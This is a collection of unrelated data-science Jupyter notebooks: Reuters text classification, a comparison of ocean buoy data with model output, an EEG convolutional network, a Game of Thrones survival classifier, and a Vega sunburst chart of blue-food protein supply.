tokens = [token for token in nlp(text) if not token.is_stop and
p.match(token.text) and
len(token.text) >= min_length]
doc = np.average([token.vector for token in tokens], axis=0)
return doc
def represent_doc2vec(train_docs, test_docs):
vectorised_train_documents = [doc2vec(doc) for doc in train_docs]
vectorised_test_documents = [doc2vec(doc) for doc in test_docs]
return vectorised_train_documents, vectorised_test_documents
def evaluate(test_labels, predictions):
precision = precision_score(test_labels, predictions, average='micro')
recall = recall_score(test_labels, predictions, average='micro')
f1 = f1_score(test_labels, predictions, average='micro')
print("Micro-average quality numbers")
print("Precision: {:.4f}, Recall: {:.4f}, F1-measure: {:.4f}".format(precision, recall, f1))
precision = precision_score(test_labels, predictions, average='macro')
recall = recall_score(test_labels, predictions, average='macro')
f1 = f1_score(test_labels, predictions, average='macro')
print("Macro-average quality numbers")
print("Precision: {:.4f}, Recall: {:.4f}, F1-measure: {:.4f}".format(precision, recall, f1))
documents = reuters.fileids()
train_docs_id = list(filter(lambda doc: doc.startswith("train"), documents))
test_docs_id = list(filter(lambda doc: doc.startswith("test"), documents))
train_docs = [reuters.raw(doc_id) for doc_id in train_docs_id]
test_docs = [reuters.raw(doc_id) for doc_id in test_docs_id]
# Transform multilabel labels
mlb = MultiLabelBinarizer()
train_labels = mlb.fit_transform([reuters.categories(doc_id) for doc_id in train_docs_id])
test_labels = mlb.transform([reuters.categories(doc_id) for doc_id in test_docs_id])
# TFIDF Experiment
model = OneVsRestClassifier(LinearSVC(random_state=42))
vectorised_train_docs, vectorised_test_docs = represent_tfidf(train_docs, test_docs)
model.fit(vectorised_train_docs, train_labels)
predictions = model.predict(vectorised_test_docs)
evaluate(test_labels, predictions)
# Embeddings Experiment
model = OneVsRestClassifier(LinearSVC(random_state=42))
vectorised_train_docs, vectorised_test_docs = represent_doc2vec(train_docs, test_docs)
model.fit(vectorised_train_docs, train_labels)
predictions = model.predict(vectorised_test_docs)
evaluate(test_labels, predictions)
```
|
github_jupyter
|
This notebook contains Hovmoller plots that compare the model output over many different depths to the results from the ORCA Buoy data.
```
import sys
sys.path.append('/ocean/kflanaga/MEOPAR/analysis-keegan/notebooks/Tools')
import numpy as np
import matplotlib.pyplot as plt
import os
import pandas as pd
import netCDF4 as nc
import xarray as xr
import datetime as dt
from salishsea_tools import evaltools as et, viz_tools, places
import gsw
import matplotlib.gridspec as gridspec
import matplotlib as mpl
import matplotlib.dates as mdates
import cmocean as cmo
import scipy.interpolate as sinterp
import math
from scipy import io
import pickle
import cmocean
import json
import Keegan_eval_tools as ket
from collections import OrderedDict
from matplotlib.colors import LogNorm
fs=16
mpl.rc('xtick', labelsize=fs)
mpl.rc('ytick', labelsize=fs)
mpl.rc('legend', fontsize=fs)
mpl.rc('axes', titlesize=fs)
mpl.rc('axes', labelsize=fs)
mpl.rc('figure', titlesize=fs)
mpl.rc('font', size=fs)
mpl.rc('font', family='sans-serif', weight='normal', style='normal')
import warnings
#warnings.filterwarnings('ignore')
from IPython.display import Markdown, display
%matplotlib inline
ptrcloc='/ocean/kflanaga/MEOPAR/savedData/201905_ptrc_data'
modver='HC201905' #HC202007 is the other option.
gridloc='/ocean/kflanaga/MEOPAR/savedData/201905_grid_data'
ORCAloc='/ocean/kflanaga/MEOPAR/savedData/ORCAData'
year=2019
mooring='Twanoh'
# Parameters
year = 2015
modver = "HC201905"
mooring = "Hansville"
ptrcloc = "/ocean/kflanaga/MEOPAR/savedData/201905_ptrc_data"
gridloc = "/ocean/kflanaga/MEOPAR/savedData/201905_grid_data"
ORCAloc = "/ocean/kflanaga/MEOPAR/savedData/ORCAData"
orca_dict=io.loadmat(f'{ORCAloc}/{mooring}.mat')
def ORCA_dd_to_dt(date_list):
UTC=[]
for yd in date_list:
if np.isnan(yd) == True:
UTC.append(float("NaN"))
else:
start = dt.datetime(1999,12,31)
delta = dt.timedelta(yd)
offset = start + delta
time=offset.replace(microsecond=0)
UTC.append(time)
return UTC
obs_tt=[]
for i in range(len(orca_dict['Btime'][1])):
obs_tt.append(np.nanmean(orca_dict['Btime'][:,i]))
#I should also change this obs_tt thing I have here into datetimes
YD_rounded=[]
for yd in obs_tt:
if np.isnan(yd) == True:
YD_rounded.append(float("NaN"))
else:
YD_rounded.append(math.floor(yd))
obs_dep=[]
for i in orca_dict['Bdepth']:
obs_dep.append(np.nanmean(i))
grid=xr.open_mfdataset(gridloc+f'/ts_{modver}_{year}_{mooring}.nc')
tt=np.array(grid.time_counter)
mod_depth=np.array(grid.deptht)
mod_votemper=(grid.votemper.isel(y=0,x=0))
mod_vosaline=(grid.vosaline.isel(y=0,x=0))
mod_votemper = (np.array(mod_votemper))
mod_votemper = np.ma.masked_equal(mod_votemper,0).T
mod_vosaline = (np.array(mod_vosaline))
mod_vosaline = np.ma.masked_equal(mod_vosaline,0).T
def Process_ORCA(orca_var,depths,dates,year):
# Transpose the columns so that a yearday column can be added.
df_1=pd.DataFrame(orca_var).transpose()
df_YD=pd.DataFrame(dates,columns=['yearday'])
df_1=pd.concat((df_1,df_YD),axis=1)
#Group by yearday so that you can take the daily mean values.
dfg=df_1.groupby(by='yearday')
df_mean=dfg.mean()
df_mean=df_mean.reset_index()
# Convert the yeardays to datetime UTC
UTC=ORCA_dd_to_dt(df_mean['yearday'])
df_mean['yearday']=UTC
# Select the range of dates that you would like.
df_year=df_mean[(df_mean.yearday >= dt.datetime(year,1,1))&(df_mean.yearday <= dt.datetime(year,12,31))]
df_year=df_year.set_index('yearday')
#Add in any missing date values
idx=pd.date_range(df_year.index[0],df_year.index[-1])
df_full=df_year.reindex(idx,fill_value=-1)
#Transpose again so that you can add a depth column.
df_full=df_full.transpose()
df_full['depth']=obs_dep
# Remove any rows that have NA values for depth.
df_full=df_full.dropna(how='all',subset=['depth'])
df_full=df_full.set_index('depth')
#Mask any NA values and any negative values.
df_final=np.ma.masked_invalid(np.array(df_full))
df_final=np.ma.masked_less(df_final,0)
return df_final, df_full.index, df_full.columns
```
## Map of Buoy Location.
```
lon,lat=places.PLACES[mooring]['lon lat']
fig, ax = plt.subplots(1,1,figsize = (6,6))
with nc.Dataset('/data/vdo/MEOPAR/NEMO-forcing/grid/bathymetry_201702.nc') as bathy:
viz_tools.plot_coastline(ax, bathy, coords = 'map',isobath=.1)
color=('firebrick')
ax.plot(lon, lat,'o',color = 'firebrick', label=mooring)
ax.set_ylim(47, 49)
ax.legend(bbox_to_anchor=[1,.6,0.45,0])
ax.set_xlim(-124, -122);
ax.set_title('Buoy Location');
```
## Temperature
```
df,dep,tim= Process_ORCA(orca_dict['Btemp'],obs_dep,YD_rounded,year)
date_range=(dt.datetime(year,1,1),dt.datetime(year,12,31))
ax=ket.hovmoeller(df,dep,tim,(2,15),date_range,title='Observed Temperature Series',
var_title='Temperature (C$^0$)',vmax=23,vmin=8,cmap=cmo.cm.thermal)
ax=ket.hovmoeller(mod_votemper, mod_depth, tt, (2,15),date_range, title='Modeled Temperature Series',
var_title='Temperature (C$^0$)',vmax=23,vmin=8,cmap=cmo.cm.thermal)
```
# Salinity
```
df,dep,tim= Process_ORCA(orca_dict['Bsal'],obs_dep,YD_rounded,year)
ax=ket.hovmoeller(df,dep,tim,(2,15),date_range,title='Observed Absolute Salinity Series',
var_title='SA (g/kg)',vmax=31,vmin=14,cmap=cmo.cm.haline)
ax=ket.hovmoeller(mod_vosaline, mod_depth, tt, (2,15),date_range,title='Modeled Absolute Salinity Series',
var_title='SA (g/kg)',vmax=31,vmin=14,cmap=cmo.cm.haline)
grid.close()
bio=xr.open_mfdataset(ptrcloc+f'/ts_{modver}_{year}_{mooring}.nc')
tt=np.array(bio.time_counter)
mod_depth=np.array(bio.deptht)
mod_flagellatets=(bio.flagellates.isel(y=0,x=0))
mod_ciliates=(bio.ciliates.isel(y=0,x=0))
mod_diatoms=(bio.diatoms.isel(y=0,x=0))
mod_Chl = np.array((mod_flagellatets+mod_ciliates+mod_diatoms)*1.8)
mod_Chl = np.ma.masked_equal(mod_Chl,0).T
df,dep,tim= Process_ORCA(orca_dict['Bfluor'],obs_dep,YD_rounded,year)
ax=ket.hovmoeller(df,dep,tim,(2,15),date_range,title='Observed Chlorophyll Series',
var_title='Chlorophyll (mg Chl/m$^3$)',vmin=0,vmax=30,cmap=cmo.cm.algae)
ax=ket.hovmoeller(mod_Chl, mod_depth, tt, (2,15),date_range,title='Modeled Chlorophyll Series',
var_title='Chlorophyll (mg Chl/m$^3$)',vmin=0,vmax=30,cmap=cmo.cm.algae)
bio.close()
```
|
github_jupyter
|
```
import torch
import torch.utils.data
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim
import numpy as np
import h5py
from data_utils import get_data
import matplotlib.pyplot as plt
from solver_pytorch import Solver
# Load data from all .mat files, combine them, eliminate EOG signals, shuffle and
# seperate training data, validation data and testing data.
# Also do mean subtraction on x.
data = get_data('../project_datasets',num_validation=100, num_test=100)
for k in data.keys():
print('{}: {} '.format(k, data[k].shape))
# class flatten to connect to FC layer
class Flatten(nn.Module):
def forward(self, x):
N, C, H = x.size() # read in N, C, H
return x.view(N, -1)
# turn x and y into torch type tensor
dtype = torch.FloatTensor
X_train = Variable(torch.Tensor(data.get('X_train'))).type(dtype)
y_train = Variable(torch.Tensor(data.get('y_train'))).type(torch.IntTensor)
X_val = Variable(torch.Tensor(data.get('X_val'))).type(dtype)
y_val = Variable(torch.Tensor(data.get('y_val'))).type(torch.IntTensor)
X_test = Variable(torch.Tensor(data.get('X_test'))).type(dtype)
y_test = Variable(torch.Tensor(data.get('y_test'))).type(torch.IntTensor)
# train a 1D convolutional neural network
# optimize hyper parameters
best_model = None
parameters =[] # a list of dictionaries
parameter = {} # a dictionary
best_params = {} # a dictionary
best_val_acc = 0.0
# hyper parameters in model
filter_nums = [20]
filter_sizes = [12]
pool_sizes = [4]
# hyper parameters in solver
batch_sizes = [100]
lrs = [5e-4]
for filter_num in filter_nums:
for filter_size in filter_sizes:
for pool_size in pool_sizes:
linear_size = int((X_test.shape[2]-filter_size)/4)+1
linear_size = int((linear_size-pool_size)/pool_size)+1
linear_size *= filter_num
for batch_size in batch_sizes:
for lr in lrs:
model = nn.Sequential(
nn.Conv1d(22, filter_num, kernel_size=filter_size, stride=4),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5),
nn.BatchNorm1d(num_features=filter_num),
nn.MaxPool1d(kernel_size=pool_size, stride=pool_size),
Flatten(),
nn.Linear(linear_size, 20),
nn.ReLU(inplace=True),
nn.Linear(20, 4)
)
model.type(dtype)
solver = Solver(model, data,
lr = lr, batch_size=batch_size,
verbose=True, print_every=50)
solver.train()
# save training results and parameters of neural networks
parameter['filter_num'] = filter_num
parameter['filter_size'] = filter_size
parameter['pool_size'] = pool_size
parameter['batch_size'] = batch_size
parameter['lr'] = lr
parameters.append(parameter)
print('Accuracy on the validation set: ', solver.best_val_acc)
print('parameters of the best model:')
print(parameter)
if solver.best_val_acc > best_val_acc:
best_val_acc = solver.best_val_acc
best_model = model
best_solver = solver
best_params = parameter
# Plot the loss function and train / validation accuracies of the best model
plt.subplot(2,1,1)
plt.plot(best_solver.loss_history)
plt.title('Training loss history')
plt.xlabel('Iteration')
plt.ylabel('Training loss')
plt.subplot(2,1,2)
plt.plot(best_solver.train_acc_history, '-o', label='train accuracy')
plt.plot(best_solver.val_acc_history, '-o', label='validation accuracy')
plt.xlabel('Iteration')
plt.ylabel('Accuracies')
plt.legend(loc='upper center', ncol=4)
plt.gcf().set_size_inches(10, 10)
plt.show()
print('Accuracy on the validation set: ', best_val_acc)
print('parameters of the best model:')
print(best_params)
# test set
y_test_pred = model(X_test)
_, y_pred = torch.max(y_test_pred,1)
test_accu = np.mean(y_pred.data.numpy() == y_test.data.numpy())
print('Test accuracy', test_accu, '\n')
```
|
github_jupyter
|
```
from sklearn import datasets #sklearn é uma das lib mais utilizadas em ML, ela contém, além dos
#datasets, várias outras funções úteis para a análise de dados
# essa lib será sua amiga durante toda sua carreira
import pandas as pd # importa a lib Pandas. Essa lib é utilizada para lidar com dataframes (TABELAS)
#de forma mais amigável.
from sklearn.model_selection import train_test_split,KFold,cross_val_score, cross_val_predict # esse método é utilizado para dividir o
# conjunto de dados em grupos de treinamento e test
from sklearn.svm import SVC #importa o algoritmo svm para ser utilizado
from sklearn import tree # importa o algoritmo arvore de decisão
from sklearn.linear_model import LogisticRegression #importa o algoritmo de regressão logística
from sklearn.metrics import mean_absolute_error #utilizada para o calculo do MAE
from sklearn.metrics import mean_squared_error #utilizada para o calculo do MSE
from sklearn.metrics import r2_score #utilizada para o calculo do R2
from sklearn import metrics #utilizada para as métricas de comparação entre os métodos
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn import svm
from google.colab import drive
drive.mount('/content/drive')
got_dataset=pd.read_csv('/content/drive/My Drive/Colab Notebooks/IGTI/app_comparacao_modelo_cap_4/character-predictions.csv')
##../input/game-of-thrones/character-predictions.csv') #realiza a leitura do dataset
got_dataset.info() #conhecendo o dataset
got_dataset.head() #mostrando o dataset
nans = got_dataset.isna().sum() #contando a quantidade de valores nulos
print(nans[nans > 0])
print("-------")
print(nans)
#Tamanho do dataset
len(got_dataset)
got_dataset.describe()
# analisando os dados nulos
print(got_dataset["age"].mean()) #possível erro no nosso dataset (média negativa para a idade?)
# realizando uma maior análise do dataset
print(got_dataset["name"][got_dataset["age"] < 0])
print("---")
print(got_dataset['age'][got_dataset['age'] < 0])
#substituindo os valores negativos
got_dataset.loc[1684, "age"] = 25.0
got_dataset.loc[1868, "age"] = 0.0
print(got_dataset["age"].mean()) #verificando, novamente, a idade
#trabalhando com dados nulos
got_dataset["age"].fillna(got_dataset["age"].mean(), inplace=True) #substituindo os valores nulos pela média da coluna
got_dataset["culture"].fillna("", inplace=True) #preenchendo os valores nulos da coluna cultura com uma string nula
# preenchendo os demais valores com -1
got_dataset.fillna(value=-1, inplace=True)
#realizando o boxplot
got_dataset.boxplot(['alive','popularity'])
#analisando a "mortalidade" dos personagens
import warnings
warnings.filterwarnings('ignore')
f,ax=plt.subplots(2,2,figsize=(17,15))
sns.violinplot("isPopular", "isNoble", hue="isAlive", data=got_dataset ,split=True, ax=ax[0, 0])
ax[0, 0].set_title('Noble and Popular vs Mortality')
ax[0, 0].set_yticks(range(2))
sns.violinplot("isPopular", "male", hue="isAlive", data=got_dataset ,split=True, ax=ax[0, 1])
ax[0, 1].set_title('Male and Popular vs Mortality')
ax[0, 1].set_yticks(range(2))
sns.violinplot("isPopular", "isMarried", hue="isAlive", data=got_dataset ,split=True, ax=ax[1, 0])
ax[1, 0].set_title('Married and Popular vs Mortality')
ax[1, 0].set_yticks(range(2))
sns.violinplot("isPopular", "book1", hue="isAlive", data=got_dataset ,split=True, ax=ax[1, 1])
ax[1, 1].set_title('Book_1 and Popular vs Mortality')
ax[1, 1].set_yticks(range(2))
plt.show()
# Retirando algumas colunas
drop = ["S.No", "pred", "alive", "plod", "name", "isAlive", "DateoFdeath"]
got_dataset.drop(drop, inplace=True, axis=1)
#Salvando uma cópia do dataset para aplicar o hotencoder
got_dataset_2 = got_dataset.copy(deep=True)
# transformando os dados categóricos em one-hot-encoder
got_dataset = pd.get_dummies(got_dataset)
got_dataset.head(10)
got_dataset.shape
# Separando o dataset entre entradas e saídas
x = got_dataset.iloc[:,1:].values
y = got_dataset.iloc[:, 0].values
print(x.shape)
print(y.shape)
```
** Iniciando a contrução do pipeline do algoritmo **
```
# aplicando o modelo de validação cruzada
# divide o dataset entre 5 diferentes grupos
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
print(kfold.get_n_splits())
# construindo os modelos de classificação
modelos = [LogisticRegression(solver='liblinear'), RandomForestClassifier(n_estimators=400, random_state=42),
DecisionTreeClassifier(random_state=42), svm.SVC(kernel='rbf', gamma='scale', random_state=42),
KNeighborsClassifier()]
#utilizando a validação cruzada
mean=[]
std=[]
for model in modelos:
result = cross_val_score(model, x, y, cv=kfold, scoring="accuracy", n_jobs=-1)
mean.append(result)
std.append(result)
classificadores=['Regressão Logística', 'Random Forest', 'Árvore de Decisão', 'SVM', 'KNN']
plt.figure(figsize=(12, 12))
for i in range(len(mean)):
sns.distplot(mean[i], hist=False, kde_kws={"shade": True})
plt.title("Distribuição de cada um dos classificadores", fontsize=15)
plt.legend(classificadores)
plt.xlabel("Acurácia", labelpad=20)
plt.yticks([])
plt.show()
```
**Realizando a previsão dos classificadores**
** Quais algoritmos escollher?**
```
# Dividindo o dataset entre treinamento 80% e teste 20%
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, stratify=y,
shuffle=True, random_state=42)
#escolhendo o svm e a floresta randomica
svm_clf = svm.SVC(C=0.9, gamma=0.1, kernel='rbf', probability=True, random_state=42)
rf_clf = RandomForestClassifier(n_estimators=400, n_jobs=-1, random_state=42)
# Treina os modelos
svm_clf.fit(x_train, y_train)
rf_clf.fit(x_train, y_train)
# obtém as probabilidades previstas
svm_prob = svm_clf.predict_proba(x_test)
rf_prob = rf_clf.predict_proba(x_test)
# Valores reais
svm_preds = np.argmax(svm_prob, axis=1)
rf_preds = np.argmax(rf_prob, axis=1)
#analisando os modelos
cm = metrics.confusion_matrix(y_test, svm_preds)
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
cm2 = metrics.confusion_matrix(y_test, rf_preds)
cm2 = cm2.astype('float') / cm2.sum(axis=1)[: , np.newaxis]
classes = ["Morto", "Vivo"]
f, ax = plt.subplots(1, 2, figsize=(15, 5))
ax[0].set_title("SVM", fontsize=15.)
sns.heatmap(pd.DataFrame(cm, index=classes, columns=classes),
cmap='winter', annot=True, fmt='.2f', ax=ax[0]).set(xlabel="Previsao", ylabel="Valor Real")
ax[1].set_title("Random Forest", fontsize=15.)
sns.heatmap(pd.DataFrame(cm2, index=classes, columns=classes),
cmap='winter', annot=True, fmt='.2f', ax=ax[1]).set(xlabel="Previsao",
ylabel="Valor Real")
```
|
github_jupyter
|
# Blue Food
Visualizing protein supply and how the practices generating that protein supply affect the ocean using a heirarchical relationship.
Note that this is a parameterized widget; the specification passed to the API will not be renderable without the geostore identifier being inserted.
*Author: Rachel Thoms
<br>Created: 08 24 2021
<br>Environment: jupyterlab*
## Style
- Vega chart
- Chart type: [Sunburst](https://vega.github.io/vega/examples/sunburst/)
- Value: Protein Supply (g/capita/day)
## Data
- Data: [ocn_calcs_015_blue_food_protein_supply](https://resourcewatch.carto.com/u/wri-rw/dataset/ocn_calcs_015_blue_food_protein_supply)
- Resource Watch: [explore page](https://resourcewatch.org/data/explore/9e1b3cad-db6f-44b0-b6fb-048df7b6c680)
- Source: [FAO Food Balance Sheet](http://www.fao.org/faostat/en/#data/FBS)
## Preparation
### Vega
```
import json
from vega import Vega
from IPython.display import display
def Vega(spec):
bundle = {}
bundle['application/vnd.vega.v5+json'] = spec
display(bundle, raw=True)
widget_width = 600
widget_height = 600
```
## Visualization
### Queries
#### Testing
``` gid_0 = 'JPN' ``` used as stand-in for parameterized ```geostore_id={{geostore_id}}``` in production version
```sql
SELECT alias.iso as gid_0, data.area, year, item as id, parent, size, value as protein, analysis_category, product
FROM
(SELECT * FROM foo_061_rw1_blue_food_supply_edit) data
INNER JOIN ow_aliasing_countries AS alias ON alias.alias = data.area
WHERE iso='JPN'
ORDER BY analysis_category ASC, id ASC
```
#### Parameterization
```sql
SELECT gadm.gid_0 as gid_0, data.area, year, item as id, parent, size, value as protein, analysis_category, product
FROM
(SELECT * FROM foo_061_rw1_blue_food_supply_edit) data
LEFT OUTER JOIN ow_aliasing_countries AS alias ON alias.alias = data.area
LEFT OUTER JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0
WHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}'
ORDER BY analysis_category ASC, id ASC
```
```
spec=json.loads("""{
"$schema": "https://vega.github.io/schema/vega/v5.json",
"padding": 5,
"autosize": "pad",
"signals": [
{
"name": "year",
"value": 2018,
"bind": {"input": "range", "min": 1961, "max": 2018, "step": 1}
}
],
"data": [
{
"name": "table",
"url": "https://wri-rw.carto.com/api/v2/sql?q= SELECT gadm.gid_0 as gid_0, data.area, year, item as id, parent, size, value as protein, analysis_category, product FROM (SELECT * FROM ocn_calcs_015_blue_food_protein_supply) data LEFT OUTER JOIN ow_aliasing_countries AS alias ON alias.alias = data.area LEFT OUTER JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 WHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}' ORDER BY analysis_category ASC, id ASC, year DESC",
"format": {"type": "json", "property": "rows"},
"transform": [
{"type": "filter", "expr": "datum.year==year"},
{"type": "stratify", "key": "id", "parentKey": "parent"},
{
"type": "partition",
"field": "size",
"sort": {"field": ["analysis_category"]},
"size": [{"signal": "2 * PI"}, {"signal": "width/4"}],
"as": ["a0", "r0", "a1", "r1", "depth", "children"],
"padding": 0
},
{"type": "formula", "expr": "split(datum.id,'_')[0]", "as": "label"},
{"type": "formula", "expr": "datum.protein ? format((datum.protein), '.1f') + ' g/capita/day' : ''", "as": "protein"}
]
}
],
"scales": [
{
"name": "legend",
"type": "ordinal",
"domain": ["Total food supply", "Pressure-generating, land-sourced foods","Ocean-sourced foods", "Other land-sourced foods"],
"range": ["#f3b229","#f5c93a","#2670a5","#e8d59a"]
},
{
"name": "blues",
"type": "linear",
"domain": {"data": "table", "field": "depth"},
"range": ["#2670a5", "#3d7fae", "#538fb7", "#699fc0"],
"domainMin": 1,
"reverse": false
},
{
"name": "greys",
"type": "ordinal",
"domain": {"data": "table", "field": "depth"},
"range": ["#f2e2b2", "#f7e9be", "#fcf0ca","#e8d59a"]
},
{
"name": "oranges",
"type": "linear",
"domain": {"data": "table", "field": "depth"},
"range": ["#f3b229", "#f4c141", "#f5c93a", "#f6d544", "#f6e04e"],
"domainMin": 1,
"reverse": false
},
{"name": "opacity",
"type": "linear",
"domain": {"data": "table", "field": "depth"},
"domainMin": 1,
"reverse": true,
"range": [0.85,1]}
],
"marks": [
{
"type": "arc",
"from": {"data": "table"},
"encode": {
"enter": {
"x": {"signal": "width/3"},
"y": {"signal": "height/2"},
"zindex": {"value": 1},
"opacity": [{"test": "test(/Secondary/, datum.product)", "value": 0.5 },{"value": 1}],
"fill": [
{
"scale": {
"signal":
"(datum.analysis_category === 'Other Land-Sourced Foods' ? 'greys': datum.analysis_category === 'Ocean-Sourced Foods' ? 'blues' : 'oranges')"
},
"field": "depth"
}
]
},
"update": {
"startAngle": {"field": "a0"},
"endAngle": {"field": "a1"},
"innerRadius": {"field": "r0"},
"outerRadius": {"field": "r1"},
"stroke": {"value": "white"},
"strokeWidth": {"value": 0.5},
"zindex": {"value": 1}
},
"hover": {
"stroke": {"value": "red"},
"strokeWidth": {"value": 2},
"zindex": {"value": 0}
}
}
}
],
"legends": [
{
"title": ["Sources of Protein"],
"orient": "none",
"legendX": {"signal" : "width*.65"},
"legendY": {"signal" : "height*.4"},
"type": "symbol",
"fill": "legend",
"titleFontSize": {"signal": "width/40"},
"titleFont": "Lato",
"labelFontSize": {"signal": "width/50"},
"labelFont": "Lato",
"clipHeight": 16,
"encode": {
"labels": {
"interactive": true,
"enter": {
"tooltip": {
"signal": "datum.label"
}
},
"update": {
"fill": {"value": "grey"}
},
"hover": {
"fill": {"value": "firebrick"}
}
}
}
}
],
"interaction_config": [
{
"name": "tooltip",
"config": {
"fields": [
{
"column": "label",
"property": "Commodity",
"type": "text",
"format": ""
},
{
"column": "protein",
"property": "Contribution to protein supply",
"type": "text",
"format": ""
}
]
}
}
]
}
""")
vega_view=dict(spec)
vega_view['legends'][0]['labelFont'] = 'Arial'
vega_view['legends'][0]['titleFont'] = 'Arial'
vega_view['height'] = widget_height
vega_view['width'] = widget_width
vega_view['data'][0]['url']= vega_view['data'][0]['url'].replace('{{geostore_env}}','geostore_prod')
vega_view['data'][0]['url'] = vega_view['data'][0]['url'].replace('{{geostore_id}}','f653d0a434168104f4bdcdf8c712d079')
Vega(vega_view)
```
[Open the Chart in the Vega Editor](https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATONABONHJnaT0AQXEACOAA8kCHABs4OtgDMdSHRBxIocALSWGJkzXFkdipLJokEx0TJABPNgZMHUs2RR0YGjg-RVgaKCCdWSRMKmkQAHcaWXo0AQAGcpl4GjIsNABmSpkHWQDvMpkkKLYIGgAvODQQVvy+snEgiDQAbVBJhCH0MLgkRXziIIYlgCZygEYADhkmL1k0UC8cKOG-byGZBC80fYBOADZ9x6R9ND2jmQQTBwHAvAC+YKk8yMSxAUEi4kwijCGy2sIAwgB5AAy+VO4nOqEu4mumGGEDgZigZJkbFU6mmqBmIAAQgAlTT5ACSABEAHL5LG4mQAUQAKgAJfIAWRFAA1uXyefkRQBlMWCiUCmQAcXZ+T52OVMjFAFU2flTarOTIAFIABQFAF0IU6ZNlcrNoYthrkmGZ8gxFCZhlhcPgiAVlM5FAVKBlFJg2PG2AgCEgcDQSDtOABHEwAflzAF4dKqRdiReixTZPEgIKwxDYIDpaLIAPpVLI5KhrVZSHQrNYDuiIZs6YoDhyKOCIgd9QYDzYmbbjnCKNjArwDpCTExhPoQdsZYFkOJhKcb2QMak6ABibMx0p0AApy5XqzoAFT3x-P2JsJ2nztrG+ztv62ztgBHYQAwOCmGE7ZwAEmAAJTdrkOhcnyfIimyOi2pi2EWAU7ZBIEfTeMeCJIkkLaaKqtYUTomJ8kx9aUOR9Y6KWHq9jOtiYmyPJ4ToLIAJo2HuB40EeJ7kOeOgMeiI6yEpqrovksSKMgZJEiAmBhDgsKiBI+TrnSySGbcbAFNMkIGXcEDaQgXoGUZsKWDQJjAusMgGOuwwegwCDUMUnY8aW8IMIiyIgJCoCGcZwxeT5yT5AF6zoMFoVDooxbFnl8VQu5yXoECfhqJYKIyAA1nAKLoMU5l9oiADSDXDNOs5kglpWwtOahqGZMheZShIgAuDyTXEemgGNJiEsyu5BDJck5ApcUuoCAxLHMk21Huww7N+Oj2lyxWgOMR3oEUJQwAQAAs8VuiA9azG95T5IoX1dPs33-e6IKlDIaSLTOkiva07RkGg5Rgi6r3QEEChuQssJmGQs7nDISWwnE7RBPksipkgzxMiAYqbpk0F2HBCH5PaM4QLBM7OFj4jJDkXhkAOoQEs4YhBk4anQdMMiYk4u6C5EqTITEbBsLI4sgJi9DJCEu6yDLwvy2LICvXcWMfQAxJYDRMDsOyvPkZsCFArwNCgMgmzs7wAOzlEgAi23AhyyAIrwoNt3qwhBqO4x5wyeJzazE6T5OgHxvpIP600LRN8iqDAxUgEbe0gK7Htez7LsNLI7uWEg00mwIDSHJYTDu7b7yvK8lhQF9r0k8gXjSuTXx53ApCKBSaBVyYFJ9ejwxkDOB75HjwwE14RPugnGhJz2Kdp1pSSLUFwM5w5+em5YOxwDslu25Y7twK8TA1x3ljlBkvv+4HwfTzCy-5yrS-oBjqsPycgN4XDkNvdAfoAyjX3pnI+udT4UzNhbK2NsXaWEelAfYj1AaF0sPbR2zt8HvADo9Z6GD3hwHKI9IY3cN79w0IPGcI8x6oAnlPEqM90B0kcHQGq-Vo5eGAfHXum8IGeiganGBIAM6H2zrnHuZNxCMJeDIFhyQ2FIm2Oo3cxsmTlEoIcAQUh9iI2+IoWqjJ9oALeqkLSG5XL6WTlI3eDlZzwnkOAnq6V9K-H0tdImt1ij0AIA0XOjUrqHSCRgOAtQsAEB2LnfoZwDDgOXNscEtIHBQH4W5YEQJfQKEwC+Agqo4DwgJGsMIBABw5UoBZa81JUKohXEsQxAg+oZKWPsBGsCPBuWRgGAJ0SQzoBfPUla+5DzHg2meZEkVSwAHI1bwHiNiLWzhVSyxFveRWyslk6ALDoJZc8GoQCWagDCIVOLSRmfJeZYRFknMlqscQWydnyzvPsi5RyTnh1+VcpZcQ9EKCWS0hycjsoIL6QZRWPkVDgMCWMyapg6ATJyDcycSz2zgpmOUJ0OgADUr56kWS3LoY5lyTnEoVjpHIL4MWYBueSuJ4hUIDiWZQfYlhwW0sOWQAgGRMy5AINkMIhygXgvig5OCHolhXVyImbQZBhnzTgcMJAX13EEhVWq2RGr0BIH+g5LwnNFBsn8DQBgjJ1XjVuNq2kURkiWoCDa8BUK84msBEiNg9V0lomGAURIwJc4VT9XAAA6iEnO+lulw0oJ0mQKSCRpLjYG1AvSHIwDYCPJFvr-XprabcZCYaC1RpjQG4tqAdgORTfIfxoB42oHhhCWFmNsbWMSnQYZzJtm6xbFYM6G4KUG1pMoHqwxxASGmh2gkCoRkTBiXdegX5KDvB9g5OdshxJItGaGOJdRMBrueg5WxEAwgICYGwEM-SUXbsXj2uA3zESql2nupdKKV0PUeo6gyT6X16RAJoZQa8QChEfiYQDb7BgfpuoUGNBAKi5wg5SQDwwQOBFvXCTwOAJSHvqJm94-lxCeIVeB1OlJbUgC8L5RwahSBoG0XAEjvlwFJhvWoUEi74P1NQyGCEMg5UbQ9d5MZTaM0gDOSiQTGBc2+PVQMotmT0BeRnEwZQUBaoyrbS6IAA)
# Indicator
## Rank
Query:
```sql
SELECT
CONCAT(rank, ' of ', max_rank)
FROM (
SELECT
gid_0,
geostore_prod,
rank,
MAX(rank) OVER (PARTITION BY true) AS max_rank
FROM (
SELECT
gid_0,
geostore_prod,
RANK() OVER(ORDER BY prop DESC) as rank
FROM (
SELECT
area,
SUM(
CASE
WHEN item = 'Ocean-Sourced Foods' THEN value
ELSE 0
END)/
NULLIF(
SUM(
CASE
WHEN item = 'Grand Total' THEN value
ELSE 0
END),0) prop
FROM ocn_calcs_015_blue_food_protein_supply
WHERE year = 2018 GROUP BY area) data
